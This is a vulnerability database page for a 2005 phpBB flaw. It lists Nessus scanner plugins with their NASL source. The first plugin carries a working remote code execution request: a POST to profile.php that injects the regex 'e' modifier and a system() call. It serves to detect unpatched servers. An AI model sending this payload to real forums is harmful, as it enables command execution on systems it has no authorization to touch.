Vulnerabilities > CVE-2005-3537 - Multiple Unspecified vulnerability in PHPBB

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
phpbb-group
nessus

Summary

A "missing request validation" error in phpBB 2 before 2.0.18 allows remote attackers to edit private messages of other users, probably by modifying certain parameters or other inputs.

Nessus

  • NASL familyCGI abuses
    NASL idPHPBB_2_0_17.NASL
    descriptionThe remote host is running a version of phpBB that, if using PHP 5 with
    last seen2020-06-01
    modified2020-06-02
    plugin id20132
    published2005-11-02
    reporterThis script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/20132
    titlephpBB <= 2.0.17 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description) {
      script_id(20132);
      script_version("1.30");
    
      script_cve_id(
        "CVE-2005-3415", 
        "CVE-2005-3416", 
        "CVE-2005-3417", 
        "CVE-2005-3418",
        "CVE-2005-3419", 
        "CVE-2005-3420", 
        "CVE-2005-3536", 
        "CVE-2005-3537"
      );
      script_bugtraq_id(15243, 15246);
    
      script_name(english:"phpBB <= 2.0.17 Multiple Vulnerabilities");
      script_summary(english:"Checks for multiple vulnerabilities in phpBB <= 2.0.17");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server contains a PHP application that is affected by
    multiple vulnerabilities." );
      script_set_attribute(attribute:"description", value:
    "The remote host is running a version of phpBB that, if using PHP 5
    with 'register_globals' enabled, fails to properly deregister global
    variables as well as failing to initialize several variables in various
    scripts.  An attacker may be able to exploit these issues to execute
    arbitrary code or to conduct SQL injection and cross-site scripting
    attacks." );
      script_set_attribute(attribute:"see_also", value:"http://www.hardened-php.net/advisory_172005.75.html" );
      script_set_attribute(attribute:"see_also", value:"https://www.phpbb.com/community/viewtopic.php?f=14&t=336756" );
      script_set_attribute(attribute:"solution", value:
    "Upgrade to phpBB version 2.0.18 or later." );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"false");
     script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2005/11/02");
     script_set_attribute(attribute:"vuln_publication_date", value: "2005/10/31");
     script_cvs_date("Date: 2018/11/15 20:50:18");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe",value:"cpe:/a:phpbb_group:phpbb");
      script_end_attributes();
     
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("phpbb_detect.nasl");
      script_exclude_keys("Settings/disable_cgi_scanning");
      script_require_ports("Services/www", 80);
      script_require_keys("www/phpBB");
      exit(0);
    }
    
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("data_protection.inc");
    
    port = get_http_port(default:80);
    if (!can_host_php(port:port)) exit(0);
    
    
    # Test an install.
    install = get_kb_item(string("www/", port, "/phpBB"));
    if (isnull(install)) exit(0);
    matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
    if (!isnull(matches)) {
      ver = matches[1];
      dir = matches[2];
    
      # Check whether the profile.php script exists.
      r = http_send_recv3(method: "GET", item:string(dir, "/profile.php?mode=register"), port:port);
      if (isnull(r)) exit(0);
      res = r[2];
    
      # If it does...
      if ('href="profile.php?mode=register&amp;sid=' >< res) {
        # Try to exploit some of the flaws to run a command.
        exploit = "system(id)";
        postdata = string(
          "mode=register&",
          "agreed=true&",
          # nb: sets $error in "includes/usercp_register.php".
          "language=1&",
          # nb: causes array_merge() to fail in "common.php" w/ PHP5 so we avoid
          #     deregistering 'signature' and 'signature_bbcode_uid'.
          "HTTP_SESSION_VARS=1&",
          # nb: specifies our exploit.
          "signature=:", exploit, "&",
          # nb: injects the "e" modifier into preg_replace; 
          #     the null-byte requires magic_quotes to be off.
          "signature_bbcode_uid=(.*)/e%00"
        );
        r = http_send_recv3(method: "POST", port: port,
          item: string(dir, "/profile.php?mode=register"), 
          content_type: "application/x-www-form-urlencoded",
          data: postdata );
        if (isnull(r)) exit(0);
        res = r[2];
    
        # There's a problem if we were able to run our command.
        if (egrep(pattern:"root:.*:0:[01]:", string:res)) {
          if (report_verbosity > 0) {
            output = strstr(res, '<textarea name="signature"');
            if (output) {
              output = output - strstr(output, "</textarea>");
              output = strstr(output, ">");
              output = output - ">";
            }
            else
    	        output = res;
            output = data_protection::sanitize_uid(output:output);
            security_hole(port:port, extra: output);
          }
          else
            security_hole(port:port);
    
          set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
          set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
          exit(0);
        }
      }
    
      # If we're being paranoid.
      if (report_paranoia > 1) {
        # Report if the version number <= 2.0.17 as the exploit might have failed.
        if (ver =~ "([01]\.|2\.0\.([0-9]($|[^0-9])|1[0-7]))") {
          security_hole(port:port, extra: "
    ***** Nessus has determined the vulnerability exists on the remote
    ***** host simply by looking at the version number of phpBB
    ***** installed there.
    ");
    
          set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
          set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
          exit(0);
        }
      }
    }
    
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_28C9243A72ED11DA8C1D000E0C2E438A.NASL
    descriptionMultiple vulnerabilities have been reported within phpbb. phpbb is proven vulnerable to : - script insertion, - bypassing of protetion mechanisms, - multiple cross site scripting vulnerabilities, - SQL injection, - arbitrary code execution
    last seen2020-06-01
    modified2020-06-02
    plugin id21405
    published2006-05-13
    reporterThis script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/21405
    titleFreeBSD : phpbb -- multiple vulnerabilities (28c9243a-72ed-11da-8c1d-000e0c2e438a)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(21405);
      script_version("1.18");
      script_cvs_date("Date: 2019/08/02 13:32:38");
    
      script_cve_id("CVE-2005-3310", "CVE-2005-3415", "CVE-2005-3416", "CVE-2005-3417", "CVE-2005-3418", "CVE-2005-3419", "CVE-2005-3420", "CVE-2005-3536", "CVE-2005-3537");
      script_bugtraq_id(15170, 15243);
    
      script_name(english:"FreeBSD : phpbb -- multiple vulnerabilities (28c9243a-72ed-11da-8c1d-000e0c2e438a)");
      script_summary(english:"Checks for updated packages in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:
    "The remote FreeBSD host is missing one or more security-related
    updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Multiple vulnerabilities have been reported within phpbb. phpbb is
    proven vulnerable to :
    
    - script insertion,
    
    - bypassing of protetion mechanisms,
    
    - multiple cross site scripting vulnerabilities,
    
    - SQL injection,
    
    - arbitrary code execution"
      );
      # http://marc.theaimsgroup.com/?l=bugtraq&m=113017003617987
      script_set_attribute(
        attribute:"see_also",
        value:"https://marc.info/?l=bugtraq&m=113017003617987"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.hardened-php.net/advisory_172005.75.html"
      );
      # https://vuxml.freebsd.org/freebsd/28c9243a-72ed-11da-8c1d-000e0c2e438a.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?165af3e7"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:phpbb");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:zh-phpbb-tw");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/10/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2006/02/16");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/13");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (pkg_test(save_report:TRUE, pkg:"phpbb<2.0.18")) flag++;
    if (pkg_test(save_report:TRUE, pkg:"zh-phpbb-tw<2.0.18")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());
      else security_hole(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DSA-925.NASL
    descriptionSeveral vulnerabilities have been discovered in phpBB, a fully featured and skinnable flat webforum. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2005-3310 Multiple interpretation errors allow remote authenticated users to inject arbitrary web script when remote avatars and avatar uploading are enabled. - CVE-2005-3415 phpBB allows remote attackers to bypass protection mechanisms that deregister global variables that allows attackers to manipulate the behaviour of phpBB. - CVE-2005-3416 phpBB allows remote attackers to bypass security checks when register_globals is enabled and the session_start function has not been called to handle a session. - CVE-2005-3417 phpBB allows remote attackers to modify global variables and bypass security mechanisms. - CVE-2005-3418 Multiple cross-site scripting (XSS) vulnerabilities allow remote attackers to inject arbitrary web scripts. - CVE-2005-3419 A SQL injection vulnerability allows remote attackers to execute arbitrary SQL commands. - CVE-2005-3420 phpBB allows remote attackers to modify regular expressions and execute PHP code via the signature_bbcode_uid parameter. - CVE-2005-3536 Missing input sanitising of the topic type allows remote attackers to inject arbitrary SQL commands. - CVE-2005-3537 Missing request validation permitted remote attackers to edit private messages of other users.
    last seen2020-06-01
    modified2020-06-02
    plugin id22791
    published2006-10-14
    reporterThis script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/22791
    titleDebian DSA-925-1 : phpbb2 - several vulnerabilities